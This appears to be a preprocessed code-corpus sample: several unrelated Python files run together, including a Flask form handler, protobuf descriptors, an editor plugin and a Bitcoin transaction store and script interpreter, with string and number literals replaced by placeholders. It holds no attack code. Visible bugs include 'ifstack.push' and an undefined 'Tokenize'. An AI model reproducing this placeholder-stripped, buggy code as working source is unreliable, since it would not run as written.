station . write ( obj . as_object ( ) ) <EOL> name = request . form [ "<STR_LIT:name>" ] <EOL> protocol = request . form [ "<STR_LIT>" ] <EOL> user = request . form [ "<STR_LIT:user>" ] <EOL> body = request . form [ "<STR_LIT:body>" ] <EOL> title = request . form [ "<STR_LIT:title>" ] <EOL> gref = Gref ( station . store , channel , name ) <EOL> root = RootObject ( name , channel , protocol ) <EOL> root_oid = _write_object ( root ) <EOL> _title = UpdateObject ( [ root_oid ] , json . dumps ( { <EOL> "<STR_LIT:type>" : "<STR_LIT:title>" , <EOL> "<STR_LIT:id>" : None , <EOL> "<STR_LIT:body>" : title , <EOL> "<STR_LIT:user>" : user <EOL> } ) ) <EOL> title_oid = _write_object ( _title ) <EOL> _body = UpdateObject ( [ title_oid ] , json . dumps ( { <EOL> "<STR_LIT:type>" : "<STR_LIT:body>" , <EOL> "<STR_LIT:id>" : None , <EOL> "<STR_LIT:body>" : body <EOL> } ) ) <EOL> body_oid = _write_object ( _body ) <EOL> _update_gref ( gref , [ Tip ( body_oid , "<STR_LIT>" ) ] , [ ] ) <EOL> return "<STR_LIT>" <EOL> return app </s>
<s> from google . protobuf import descriptor as _descriptor <EOL> from google . protobuf import message as _message <EOL> from google . protobuf import reflection as _reflection <EOL> from google . protobuf import descriptor_pb2 <EOL> import groundstation . objects . base_object_pb2 <EOL> DESCRIPTOR = _descriptor . FileDescriptor ( <EOL> name = '<STR_LIT>' , <EOL> package = '<STR_LIT>' , <EOL> serialized_pb = '<STR_LIT>' ) <EOL> _UPDATEOBJECT = _descriptor . Descriptor ( <EOL> name = '<STR_LIT>' , <EOL> full_name = '<STR_LIT>' , <EOL> filename = None , <EOL> file = DESCRIPTOR , <EOL> containing_type = None , <EOL> fields = [ <EOL> _descriptor . FieldDescriptor ( <EOL> name = '<STR_LIT>' , full_name = '<STR_LIT>' , index = <NUM_LIT:0> , <EOL> number = <NUM_LIT:1> , type = <NUM_LIT:12> , cpp_type = <NUM_LIT:9> , label = <NUM_LIT:3> , <EOL> has_default_value = False , default_value = [ ] , <EOL> message_type = None , enum_type = None , containing_type = None , <EOL> is_extension = False , extension_scope = None , <EOL> options = None ) , <EOL> _descriptor . FieldDescriptor ( <EOL> name = '<STR_LIT:data>' , full_name = '<STR_LIT>' , index = <NUM_LIT:1> , <EOL> number = <NUM_LIT:2> , type = <NUM_LIT:12> , cpp_type = <NUM_LIT:9> , label = <NUM_LIT:2> , <EOL> has_default_value = False , default_value = "<STR_LIT>" , <EOL> message_type = None , enum_type = None , containing_type = None , <EOL> is_extension = False , extension_scope = None , <EOL> options = None ) , <EOL> _descriptor . FieldDescriptor ( <EOL> name = '<STR_LIT:type>' , full_name = '<STR_LIT>' , index = <NUM_LIT:2> , <EOL> number = <NUM_LIT:15> , type = <NUM_LIT> , cpp_type = <NUM_LIT:8> , label = <NUM_LIT:1> , <EOL> has_default_value = True , default_value = <NUM_LIT:2> , <EOL> message_type = None , enum_type = None , containing_type = None , <EOL> is_extension = False , extension_scope = None , <EOL> options = None ) , <EOL> ] , <EOL> extensions = [ <EOL> ] , <EOL> nested_types = [ ] , <EOL> enum_types = [ <EOL> ] , <EOL> options = None , <EOL> is_extendable = False , <EOL> extension_ranges = [ ] , <EOL> serialized_start = <NUM_LIT> , <EOL> serialized_end = <NUM_LIT> , <EOL> ) <EOL> _UPDATEOBJECT . fields_by_name [ '<STR_LIT:type>' ] . enum_type = groundstation . objects . base_object_pb2 . _GIZMOTYPE <EOL> DESCRIPTOR . message_types_by_name [ '<STR_LIT>' ] = _UPDATEOBJECT <EOL> class UpdateObject ( _message . Message ) : <EOL> __metaclass__ = _reflection . GeneratedProtocolMessageType <EOL> DESCRIPTOR = _UPDATEOBJECT </s>
<s> import groundstation . proto . object_list_pb2 <EOL> from groundstation import logger <EOL> log = logger . getLogger ( __name__ ) <EOL> def handle_newobject ( self ) : <EOL> obj = self . payload <EOL> if obj not in self . station : <EOL> request = self . _Request ( "<STR_LIT>" , payload = obj ) <EOL> self . stream . enqueue ( request ) </s>
<s> from . cli import main <EOL> main ( ) </s>
<s> from suplemon import helpers <EOL> from suplemon . suplemon_module import Module <EOL> class Comment ( Module ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , app , editor , args ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> comment = editor . syntax . get_comment ( ) <EOL> except : <EOL> return False <EOL> line_nums = editor . get_lines_with_cursors ( ) <EOL> for lnum in line_nums : <EOL> line = editor . lines [ lnum ] <EOL> if not len ( line ) : <EOL> continue <EOL> target = str ( line ) . strip ( ) <EOL> w = helpers . whitespace ( line ) <EOL> if helpers . starts ( target , comment [ <NUM_LIT:0> ] ) : <EOL> new_line = ( "<STR_LIT:U+0020>" * w ) + line [ w + len ( comment [ <NUM_LIT:0> ] ) : ] <EOL> if comment [ <NUM_LIT:1> ] : <EOL> if helpers . ends ( new_line , comment [ <NUM_LIT:1> ] ) : <EOL> new_line = new_line [ : - <NUM_LIT:1> * len ( comment [ <NUM_LIT:1> ] ) ] <EOL> editor . lines [ lnum ] . set_data ( new_line ) <EOL> else : <EOL> new_line = line [ w : ] <EOL> new_line = ( "<STR_LIT:U+0020>" * w ) + comment [ <NUM_LIT:0> ] + new_line <EOL> if comment [ <NUM_LIT:1> ] : <EOL> new_line += comment [ <NUM_LIT:1> ] <EOL> editor . lines [ lnum ] . set_data ( new_line ) <EOL> editor . move_cursors ( ) <EOL> editor . store_action_state ( "<STR_LIT>" ) <EOL> module = { <EOL> "<STR_LIT:class>" : Comment , <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> } </s>
<s> import os <EOL> import random <EOL> import sqlite3 <EOL> import struct <EOL> from . import database <EOL> from . import keys <EOL> from . . import coins <EOL> from . . import protocol <EOL> from . . import script <EOL> from . . import util <EOL> __all__ = [ '<STR_LIT>' ] <EOL> def get_q ( txid ) : <EOL> '<STR_LIT>' <EOL> return struct . unpack ( '<STR_LIT>' , txid [ : <NUM_LIT:4> ] ) [ <NUM_LIT:0> ] <EOL> _KEY_DUP = '<STR_LIT>' <EOL> _0 = chr ( <NUM_LIT:0> ) * <NUM_LIT:32> <EOL> class Transaction ( object ) : <EOL> def __init__ ( self , database , row , _transaction = None ) : <EOL> keys = [ n for ( n , t , i ) in database . Columns ] <EOL> self . _database = database <EOL> self . _data = dict ( zip ( keys , row ) ) <EOL> self . _po_cache = dict ( ) <EOL> self . _transaction = _transaction <EOL> version = property ( lambda s : s . txn . version ) <EOL> inputs = property ( lambda s : s . txn . tx_in ) <EOL> outputs = property ( lambda s : s . txn . tx_out ) <EOL> lock_time = property ( lambda s : s . txn . lock_time ) <EOL> hash = property ( lambda s : s . txn . hash ) <EOL> index = property ( lambda s : keys . get_txck_index ( s . _txck ) ) <EOL> def __getstate__ ( self ) : <EOL> return ( self . _po_cache , dict ( txn = str ( self . _data [ '<STR_LIT>' ] ) , txck = self . _data [ '<STR_LIT>' ] ) ) <EOL> def __setstate__ ( self , state ) : <EOL> self . _database = None <EOL> ( self . _po_cache , self . _data ) = state <EOL> self . _transaction = None <EOL> def cache_previous_outputs ( self ) : <EOL> for i in xrange ( <NUM_LIT:0> , len ( self . inputs ) ) : <EOL> self . previous_transaction ( i ) <EOL> def previous_transaction ( self , index ) : <EOL> "<STR_LIT>" <EOL> if self . index == <NUM_LIT:0> and index == <NUM_LIT:0> : <EOL> return None <EOL> if index not in self . _po_cache : <EOL> po_hash = self . inputs [ index ] . previous_output . hash <EOL> previous_txn = self . _database . get ( po_hash ) <EOL> if previous_txn is None : <EOL> raise KeyError ( '<STR_LIT>' % po_hash ) <EOL> self . _po_cache [ index ] = previous_txn <EOL> return self . _po_cache [ index ] <EOL> def previous_output ( self , index ) : <EOL> '<STR_LIT>' <EOL> previous_txn = self . previous_transaction ( index ) <EOL> if previous_txn is None : return None <EOL> po = self . inputs [ index ] . previous_output <EOL> return previous_txn . outputs [ po . index ] <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % self . hash . encode ( '<STR_LIT>' ) <EOL> _txck = property ( lambda s : s . _data [ '<STR_LIT>' ] ) <EOL> _blockid = property ( lambda s : keys . get_txck_blockid ( s . _txck ) ) <EOL> def _previous_uock ( self , index ) : <EOL> previous_txn = self . previous_transaction ( index ) <EOL> if previous_txn is None : return None <EOL> po = self . inputs [ index ] . previous_output <EOL> return keys . get_uock ( previous_txn . _txck , po . index ) <EOL> @ property <EOL> def txn ( self ) : <EOL> '<STR_LIT>' <EOL> if self . _transaction is None : <EOL> ( vl , self . _transaction ) = protocol . Txn . parse ( self . txn_binary ) <EOL> return self . _transaction <EOL> txn_binary = property ( lambda s : str ( s . _data [ '<STR_LIT>' ] ) ) <EOL> class Database ( database . Database ) : <EOL> MINIMUM_N = <NUM_LIT:4> <EOL> TARGET_SIZE = ( <NUM_LIT:1> << <NUM_LIT:30> ) * <NUM_LIT:7> // <NUM_LIT:4> <EOL> Columns = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , False ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , False ) , <EOL> ] <EOL> Name = '<STR_LIT>' <EOL> def __init__ ( self , data_dir = None , coin = coins . Bitcoin ) : <EOL> database . Database . __init__ ( self , data_dir , coin ) <EOL> self . _connections = dict ( ) <EOL> self . _N = self . load_n ( ) <EOL> n = self . _N <EOL> while n >= self . MINIMUM_N : <EOL> self . get_connection ( n , <NUM_LIT:0> , True ) <EOL> n //= <NUM_LIT:2> <EOL> def load_n ( self ) : <EOL> '<STR_LIT>' <EOL> n = self . MINIMUM_N <EOL> while True : <EOL> if not os . path . isfile ( self . get_filename ( self . get_suffix ( n * <NUM_LIT:2> , <NUM_LIT:0> ) ) ) : <EOL> break <EOL> n *= <NUM_LIT:2> <EOL> return n <EOL> def get_suffix ( self , n , q ) : <EOL> return '<STR_LIT>' % ( n , q % n ) <EOL> def get_connection ( self , n , q , allow_create = False ) : <EOL> '''<STR_LIT>''' <EOL> loc = ( n , q % n ) <EOL> if loc not in self . _connections : <EOL> locs = [ ( n , i ) for i in xrange ( <NUM_LIT:0> , n ) ] <EOL> if not os . path . isfile ( self . get_filename ( self . get_suffix ( n , <NUM_LIT:0> ) ) ) : <EOL> if not allow_create : return None <EOL> locs . reverse ( ) <EOL> for l in locs : <EOL> suffix = self . get_suffix ( l [ <NUM_LIT:0> ] , l [ <NUM_LIT:1> ] ) <EOL> self . _connections [ l ] = database . Database . get_connection ( self , suffix ) <EOL> return self . _connections [ loc ] <EOL> def check_size ( self ) : <EOL> '<STR_LIT>' <EOL> suffix = self . get_suffix ( self . _N , random . randint ( <NUM_LIT:0> , self . _N - <NUM_LIT:1> ) ) <EOL> filename = self . get_filename ( suffix ) <EOL> if os . path . getsize ( filename ) > self . TARGET_SIZE : <EOL> self . _N *= <NUM_LIT:2> <EOL> self . get_connection ( self . _N , <NUM_LIT:0> , True ) <EOL> def add ( self , block , transactions ) : <EOL> '<STR_LIT>' <EOL> self . check_size ( ) <EOL> block . _check_merkle_root ( util . get_merkle_root ( transactions ) ) <EOL> connections = dict ( ) <EOL> block_txns = [ ] <EOL> for ( txn_index , txn ) in enumerate ( transactions ) : <EOL> txid = txn . hash <EOL> q = get_q ( txid ) <EOL> connection = self . get_connection ( self . _N , q ) <EOL> connections [ ( self . _N , q % self . _N ) ] = connection <EOL> cursor = connection . cursor ( ) <EOL> txck = keys . get_txck ( block . _blockid , txn_index ) <EOL> row = ( txck , keys . get_hint ( txid ) , buffer ( txn . binary ( ) ) ) <EOL> try : <EOL> cursor . execute ( self . sql_insert , row ) <EOL> except sqlite3 . IntegrityError , e : <EOL> if e . message != _KEY_DUP : <EOL> raise e <EOL> block_txns . append ( Transaction ( self , row , txn ) ) <EOL> for connection in connections . values ( ) : <EOL> connection . commit ( ) <EOL> block . _update_transactions ( block_txns ) <EOL> return block <EOL> def _get ( self , txck ) : <EOL> '<STR_LIT>' <EOL> for connection in self . _connections . values ( ) : <EOL> cursor = connection . cursor ( ) <EOL> cursor . execute ( self . sql_select + '<STR_LIT>' , ( txck , ) ) <EOL> row = cursor . fetchone ( ) <EOL> if row : <EOL> return Transaction ( self , row ) <EOL> return None <EOL> def _get_transactions ( self , blockid ) : <EOL> "<STR_LIT>" <EOL> lo = keys . get_txck ( blockid , <NUM_LIT:0> ) <EOL> hi = keys . get_txck ( blockid + <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> txns = [ ] <EOL> for connection in self . _connections . values ( ) : <EOL> cursor = connection . cursor ( ) <EOL> cursor . execute ( self . sql_select + '<STR_LIT>' , ( lo , hi ) ) <EOL> txns . extend ( ( r [ <NUM_LIT:0> ] , r ) for r in cursor . fetchall ( ) ) <EOL> txns . sort ( ) <EOL> return [ Transaction ( self , row ) for ( txck , row ) in txns ] <EOL> def get ( self , txid , default = None ) : <EOL> '<STR_LIT>' <EOL> txid_hint = keys . get_hint ( txid ) <EOL> n = self . _N <EOL> q = get_q ( txid ) <EOL> while n >= self . MINIMUM_N : <EOL> connection = self . get_connection ( n , q ) <EOL> cursor = connection . cursor ( ) <EOL> cursor . execute ( self . sql_select + '<STR_LIT>' , ( txid_hint , ) ) <EOL> for row in cursor . fetchall ( ) : <EOL> ( vl , txn ) = protocol . Txn . parse ( row [ <NUM_LIT:2> ] ) <EOL> if txn . hash == txid : <EOL> return Transaction ( self , row , txn ) <EOL> n //= <NUM_LIT:2> <EOL> new_n = self . load_n ( ) <EOL> if new_n != self . _N : <EOL> self . _N = new_n <EOL> return self . _get ( txid ) <EOL> return default </s>
<s> import inspect <EOL> import struct <EOL> from . bytevector import ByteVector <EOL> from . import opcodes <EOL> from . . import coins <EOL> from . . import protocol <EOL> from . . import util <EOL> from . . protocol import format <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> Zero = ByteVector . from_value ( <NUM_LIT:0> ) <EOL> One = ByteVector . from_value ( <NUM_LIT:1> ) <EOL> def _is_pubkey ( opcode , bytes , data ) : <EOL> if opcode != Tokenizer . OP_LITERAL : <EOL> return False <EOL> if len ( data ) != <NUM_LIT> or data [ <NUM_LIT:0> ] != chr ( <NUM_LIT> ) : <EOL> return False <EOL> return True <EOL> def _is_hash160 ( opcode , bytes , data ) : <EOL> if opcode != Tokenizer . OP_LITERAL : <EOL> return False <EOL> if len ( data ) != <NUM_LIT:20> : <EOL> return False <EOL> return True <EOL> def _is_hash256 ( opcode , bytes , data ) : <EOL> if opcode != Tokenizer . OP_LITERAL : <EOL> return False <EOL> if len ( data ) != <NUM_LIT:32> : <EOL> return False <EOL> return True <EOL> def _too_long ( opcode , bytes , data ) : <EOL> return False <EOL> SCRIPT_FORM_NON_STANDARD = '<STR_LIT>' <EOL> SCRIPT_FORM_PAY_TO_PUBKEY_HASH = '<STR_LIT>' <EOL> SCRIPT_FORM_PAY_TO_PUBKEY = '<STR_LIT>' <EOL> SCRIPT_FORM_UNSPENDABLE = '<STR_LIT>' <EOL> SCRIPT_FORM_ANYONE_CAN_SPEND = '<STR_LIT>' <EOL> SCRIPT_FORM_TRANSACTION_PUZZLE_HASH256 = '<STR_LIT>' <EOL> STANDARD_SCRIPT_FORMS = [ <EOL> SCRIPT_FORM_PAY_TO_PUBKEY_HASH , <EOL> SCRIPT_FORM_PAY_TO_PUBKEY <EOL> ] <EOL> TEMPLATE_PAY_TO_PUBKEY_HASH = ( lambda t : len ( t ) == <NUM_LIT:5> , opcodes . OP_DUP , <EOL> opcodes . OP_HASH160 , _is_hash160 , opcodes . OP_EQUALVERIFY , <EOL> opcodes . OP_CHECKSIG ) <EOL> TEMPLATE_PAY_TO_PUBKEY = ( lambda t : len ( t ) == <NUM_LIT:2> , _is_pubkey , <EOL> opcodes . OP_CHECKSIG ) <EOL> Templates = [ <EOL> ( SCRIPT_FORM_PAY_TO_PUBKEY_HASH , TEMPLATE_PAY_TO_PUBKEY_HASH ) , <EOL> ( SCRIPT_FORM_PAY_TO_PUBKEY , TEMPLATE_PAY_TO_PUBKEY ) , <EOL> ] <EOL> def _stack_op ( stack , func ) : <EOL> '''<STR_LIT>''' <EOL> count = len ( inspect . getargspec ( func ) . args ) <EOL> if len ( stack ) < count : return False <EOL> args = stack [ - count : ] <EOL> stack [ - count : ] = [ ] <EOL> for item in func ( * args ) : <EOL> stack . append ( item ) <EOL> return True <EOL> def _math_op ( stack , func , check_overflow = True ) : <EOL> '''<STR_LIT>''' <EOL> count = len ( inspect . getargspec ( func ) . args ) <EOL> if len ( stack ) < count : return False <EOL> args = stack [ - count : ] <EOL> stack [ - count : ] = [ ] <EOL> if check_overflow : <EOL> for arg in args : <EOL> if len ( arg ) > <NUM_LIT:4> : return False <EOL> result = func ( * args ) <EOL> if result == True : <EOL> result = One <EOL> elif result == False : <EOL> result = Zero <EOL> if result is not None : <EOL> stack . append ( result ) <EOL> return True <EOL> def _hash_op ( stack , func ) : <EOL> '''<STR_LIT>''' <EOL> if len ( stack ) < <NUM_LIT:1> : return False <EOL> value = func ( stack . pop ( ) . vector ) <EOL> stack . append ( ByteVector ( value ) ) <EOL> return True <EOL> def check_signature ( signature , public_key , hash_type , subscript , transaction , input_index ) : <EOL> if hash_type == <NUM_LIT:0> : <EOL> hash_type = ord ( signature [ - <NUM_LIT:1> ] ) <EOL> if hash_type != ord ( signature [ - <NUM_LIT:1> ] ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> signature = signature [ : - <NUM_LIT:1> ] <EOL> if ( hash_type & <NUM_LIT> ) == <NUM_LIT> or hash_type == <NUM_LIT:0> : <EOL> tx_ins = [ ] <EOL> for ( index , tx_in ) in enumerate ( transaction . inputs ) : <EOL> script = '<STR_LIT>' <EOL> if index == input_index : <EOL> script = subscript <EOL> tx_in = protocol . TxnIn ( tx_in . previous_output , script , tx_in . sequence ) <EOL> tx_ins . append ( tx_in ) <EOL> tx_outs = transaction . outputs <EOL> elif ( hash_type & <NUM_LIT> ) == <NUM_LIT> : <EOL> tx_ins = [ ] <EOL> index = <NUM_LIT:0> <EOL> for tx_in in transaction . inputs : <EOL> script = '<STR_LIT>' <EOL> sequence = <NUM_LIT:0> <EOL> if index == input_index : <EOL> script = subscript <EOL> sequence = tx_in . sequence <EOL> index += <NUM_LIT:1> <EOL> tx_in = protocol . TxnIn ( tx_in . previous_output , script , sequence ) <EOL> tx_ins . append ( tx_in ) <EOL> tx_outs = [ ] <EOL> elif ( hash_type & <NUM_LIT> ) == <NUM_LIT> : <EOL> tx_ins = [ ] <EOL> index = <NUM_LIT:0> <EOL> for tx_in in transaction . inputs : <EOL> script = '<STR_LIT>' <EOL> sequence = <NUM_LIT:0> <EOL> if index == input_index : <EOL> script = subscript <EOL> sequence = tx_in . sequence <EOL> index += <NUM_LIT:1> <EOL> tx_in = protocol . TxnIn ( tx_in . previous_output , script , sequence ) <EOL> tx_ins . append ( tx_in ) <EOL> tx_outs = [ ] <EOL> index = <NUM_LIT:0> <EOL> for tx_out in transaction . outputs : <EOL> if len ( tx_outs ) > input_index : break <EOL> if index != input_index : <EOL> tx_out = protocol . TxnOut ( - <NUM_LIT:1> , '<STR_LIT>' ) <EOL> tx_outs . append ( tx_out ) <EOL> index += <NUM_LIT:1> <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % hash_type ) <EOL> if ( hash_type & <NUM_LIT> ) == <NUM_LIT> : <EOL> tx_in = transaction . inputs [ input_index ] <EOL> tx_ins = [ protocol . TxnIn ( tx_in . previous_output , subscript , tx_in . sequence ) ] <EOL> tx_outs = transaction . outputs <EOL> tx_copy = FlexTxn ( transaction . version , tx_ins , tx_outs , transaction . lock_time ) <EOL> sig_hash = struct . pack ( '<STR_LIT>' , hash_type ) <EOL> payload = tx_copy . binary ( ) + sig_hash <EOL> return util . ecc . verify ( payload , public_key , signature ) <EOL> class FlexTxn ( protocol . Txn ) : <EOL> properties = [ <EOL> ( '<STR_LIT:version>' , format . FormatTypeNumber ( '<STR_LIT:I>' ) ) , <EOL> ( '<STR_LIT>' , format . FormatTypeArray ( format . FormatTypeTxnIn , <NUM_LIT:1> ) ) , <EOL> ( '<STR_LIT>' , format . FormatTypeArray ( format . FormatTypeTxnOut ) ) , <EOL> ( '<STR_LIT>' , format . FormatTypeNumber ( '<STR_LIT:I>' ) ) , <EOL> ] <EOL> class Tokenizer ( object ) : <EOL> '''<STR_LIT>''' <EOL> OP_LITERAL = <NUM_LIT> <EOL> def __init__ ( self , script , expand_verify = False ) : <EOL> self . _script = script <EOL> self . _expand_verify = expand_verify <EOL> self . _tokens = [ ] <EOL> self . _process ( script ) <EOL> def append ( self , script ) : <EOL> self . _script += script <EOL> self . _process ( script ) <EOL> def get_subscript ( self , start_index = <NUM_LIT:0> , filter = None ) : <EOL> '''<STR_LIT>''' <EOL> output = '<STR_LIT>' <EOL> for ( opcode , bytes , value ) in self . _tokens [ start_index : ] : <EOL> if filter and not filter ( opcode , bytes , value ) : <EOL> continue <EOL> output += bytes <EOL> return output <EOL> def match_template ( self , template ) : <EOL> '<STR_LIT>' <EOL> if not template [ <NUM_LIT:0> ] ( self ) : <EOL> return False <EOL> for ( ( o , b , v ) , t ) in zip ( self . _tokens , template [ <NUM_LIT:1> : ] ) : <EOL> if callable ( t ) : <EOL> if not t ( o , b , v ) : <EOL> return False <EOL> elif t != o : <EOL> return False <EOL> return True <EOL> _Verify = { <EOL> opcodes . OP_EQUALVERIFY : opcodes . OP_EQUAL , <EOL> opcodes . OP_NUMEQUALVERIFY : opcodes . OP_NUMEQUAL , <EOL> opcodes . OP_CHECKSIGVERIFY : opcodes . OP_CHECKSIG , <EOL> opcodes . OP_CHECKMULTISIGVERIFY : opcodes . OP_CHECKMULTISIG , <EOL> } <EOL> def _process ( self , script ) : <EOL> '<STR_LIT>' <EOL> while script : <EOL> opcode = ord ( script [ <NUM_LIT:0> ] ) <EOL> bytes = script [ <NUM_LIT:0> ] <EOL> script = script [ <NUM_LIT:1> : ] <EOL> value = None <EOL> verify = False <EOL> if opcode == opcodes . OP_0 : <EOL> value = Zero <EOL> opcode = Tokenizer . OP_LITERAL <EOL> elif <NUM_LIT:1> <= opcode <= <NUM_LIT> : <EOL> length = opcode <EOL> if opcodes . OP_PUSHDATA1 <= opcode <= opcodes . OP_PUSHDATA4 : <EOL> op_length = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:4> ] [ opcode - opcodes . OP_PUSHDATA1 ] <EOL> format = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] [ opcode - opcodes . OP_PUSHDATA1 ] <EOL> length = struct . unpack ( format , script [ : op_length ] ) [ <NUM_LIT:0> ] <EOL> bytes += script [ : op_length ] <EOL> script = script [ op_length : ] <EOL> value = ByteVector ( vector = script [ : length ] ) <EOL> bytes += script [ : length ] <EOL> script = script [ length : ] <EOL> if len ( value ) != length : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> opcode = Tokenizer . OP_LITERAL <EOL> elif opcode == opcodes . OP_1NEGATE : <EOL> opcode = Tokenizer . OP_LITERAL <EOL> value = ByteVector . from_value ( - <NUM_LIT:1> ) <EOL> elif opcode == opcodes . OP_TRUE : <EOL> opcode = Tokenizer . OP_LITERAL <EOL> value = ByteVector . from_value ( <NUM_LIT:1> ) <EOL> elif opcodes . OP_1 <= opcode <= opcodes . OP_16 : <EOL> value = ByteVector . from_value ( opcode - opcodes . OP_1 + <NUM_LIT:1> ) <EOL> opcode = Tokenizer . OP_LITERAL <EOL> elif self . _expand_verify and opcode in self . _Verify : <EOL> opcode = self . _Verify [ opcode ] <EOL> verify = True <EOL> self . _tokens . append ( ( opcode , bytes , value ) ) <EOL> if verify : <EOL> self . _tokens . append ( ( opcodes . OP_VERIFY , '<STR_LIT>' , None ) ) <EOL> def get_bytes ( self , index ) : <EOL> '<STR_LIT>' <EOL> return self . _tokens [ index ] [ <NUM_LIT:1> ] <EOL> def get_value ( self , index ) : <EOL> '<STR_LIT>' <EOL> return self . _tokens [ index ] [ <NUM_LIT:2> ] <EOL> def __len__ ( self ) : <EOL> return len ( self . _tokens ) <EOL> def __getitem__ ( self , name ) : <EOL> return self . _tokens [ name ] [ <NUM_LIT:0> ] <EOL> def __iter__ ( self ) : <EOL> for ( opcode , bytes , value ) in self . _tokens : <EOL> yield opcode <EOL> def __str__ ( self ) : <EOL> output = [ ] <EOL> for ( opcode , bytes , value ) in self . _tokens : <EOL> if opcode == Tokenizer . OP_LITERAL : <EOL> output . append ( value . vector . encode ( '<STR_LIT>' ) ) <EOL> else : <EOL> if bytes : <EOL> output . append ( opcodes . get_opcode_name ( ord ( bytes [ <NUM_LIT:0> ] ) ) ) <EOL> return "<STR_LIT:U+0020>" . join ( output ) <EOL> class Script ( object ) : <EOL> def __init__ ( self , transaction , coin = coins . Bitcoin ) : <EOL> self . _transaction = transaction <EOL> self . _coin = coin <EOL> @ property <EOL> def output_count ( self ) : <EOL> return len ( self . _transaction . outputs ) <EOL> def output_address ( self , output_index ) : <EOL> pk_script = self . _transaction . outputs [ output_index ] . pk_script <EOL> tokens = Tokenizer ( pk_script ) <EOL> if tokens . match_template ( TEMPLATE_PAY_TO_PUBKEY_HASH ) : <EOL> pubkeyhash = tokens . get_value ( <NUM_LIT:2> ) . vector <EOL> return util . key . pubkeyhash_to_address ( pubkeyhash , self . _coin . address_version ) <EOL> if tokens . match_template ( TEMPLATE_PAY_TO_PUBKEY ) : <EOL> pubkey = tokens . get_value ( <NUM_LIT:0> ) . vector <EOL> return util . key . publickey_to_address ( pubkey , self . _coin . address_version ) <EOL> return None <EOL> def script_form ( self , output_index ) : <EOL> pk_script = self . _transaction . outputs [ output_index ] . pk_script <EOL> tokens = Tokenizer ( pk_script ) <EOL> for ( sf , template ) in Templates : <EOL> if tokens . match_template ( template ) : <EOL> return sf <EOL> return SCRIPT_FORM_NON_STANDARD <EOL> def is_standard_script ( self , output_index ) : <EOL> pk_script = self . _transaction . outputs [ output_index ] <EOL> tokens = Tokenize ( pk_script , expand_verify = False ) <EOL> for sf in STANDARD_SCRIPT_FORMS : <EOL> if tokens . match_template ( Templates [ sf ] ) : <EOL> return True <EOL> return False <EOL> @ property <EOL> def input_count ( self ) : <EOL> return len ( self . _transaction . inputs ) <EOL> def verify_input ( self , input_index , pk_script ) : <EOL> input = self . _transaction . inputs [ input_index ] <EOL> return self . process ( input . signature_script , pk_script , self . _transaction , input_index ) <EOL> def verify ( self ) : <EOL> '''<STR_LIT>''' <EOL> for i in xrange ( <NUM_LIT:0> , len ( self . _transaction . inputs ) ) : <EOL> if self . _transaction . index == <NUM_LIT:0> and i == <NUM_LIT:0> : continue <EOL> input = self . _transaction . inputs [ i ] <EOL> previous_output = self . _transaction . previous_output ( i ) <EOL> if not self . verify_input ( i , previous_output . pk_script ) : <EOL> return False <EOL> return True <EOL> @ staticmethod <EOL> def process ( signature_script , pk_script , transaction , input_index , hash_type = <NUM_LIT:0> ) : <EOL> tokens = Tokenizer ( signature_script , expand_verify = True ) <EOL> signature_length = len ( tokens ) <EOL> tokens . append ( pk_script ) <EOL> last_codeseparator = signature_length <EOL> for token in tokens : <EOL> if token in ( opcodes . OP_VERIF , opcodes . OP_VERNOTIF ) : <EOL> return False <EOL> ifstack = [ ] <EOL> stack = [ ] <EOL> altstack = [ ] <EOL> for pc in xrange ( <NUM_LIT:0> , len ( tokens ) ) : <EOL> opcode = tokens [ pc ] <EOL> if opcode == opcodes . OP_IF : <EOL> ifstack . append ( stack . pop ( ) . value != <NUM_LIT:0> ) <EOL> elif opcode == opcodes . OP_NOTIF : <EOL> ifstack . append ( stack . pop ( ) . value == <NUM_LIT:0> ) <EOL> elif opcode == opcodes . OP_ELSE : <EOL> if len ( ifstack ) == <NUM_LIT:0> : return False <EOL> ifstack . push ( not ifstack . pop ( ) ) <EOL> elif opcode == opcodes . OP_ENDIF : <EOL> if len ( ifstack ) == <NUM_LIT:0> : return False <EOL> ifstack . pop ( ) <EOL> if False in ifstack : continue <EOL> if opcode == Tokenizer . OP_LITERAL : <EOL> stack . append ( tokens . get_value ( pc ) ) <EOL> elif opcode == opcodes . OP_NOP : <EOL> pass <EOL> elif opcode == opcodes . OP_VERIFY : <EOL> if len ( stack ) < <NUM_LIT:1> : return False <EOL> if bool ( stack [ - <NUM_LIT:1> ] ) : <EOL> stack . pop ( ) <EOL> else : <EOL> return False <EOL> elif opcode == opcodes . OP_RETURN : <EOL> return False <EOL> elif opcode == opcodes . OP_TOALTSTACK : <EOL> if len ( stack ) < <NUM_LIT:1> : return False <EOL> altstack . append ( stack . pop ( ) ) <EOL> elif opcode == opcodes . OP_FROMALTSTACK : <EOL> if len ( altstack ) < <NUM_LIT:1> : return False <EOL> stack . append ( altstack . pop ( ) ) <EOL> elif opcode == opcodes . OP_IFDUP : <EOL> if len ( stack ) < <NUM_LIT:1> : return False <EOL> if bool ( stack [ - <NUM_LIT:1> ] ) : <EOL> stack . append ( stack [ - <NUM_LIT:1> ] ) <EOL> elif opcode == opcodes . OP_DEPTH : <EOL> stack . append ( ByteVector . from_value ( len ( stack ) ) ) <EOL> elif opcode == opcodes . OP_DROP : <EOL> if not _stack_op ( stack , lambda x : [ ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_DUP : <EOL> if not _stack_op ( stack , lambda x : [ x , x ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_NIP : <EOL> if not _stack_op ( stack , lambda x1 , x2 : [ x2 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_OVER : <EOL> if not _stack_op ( stack , lambda x1 , x2 : [ x1 , x2 , x1 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_PICK : <EOL> if len ( stack ) < <NUM_LIT:2> : return False 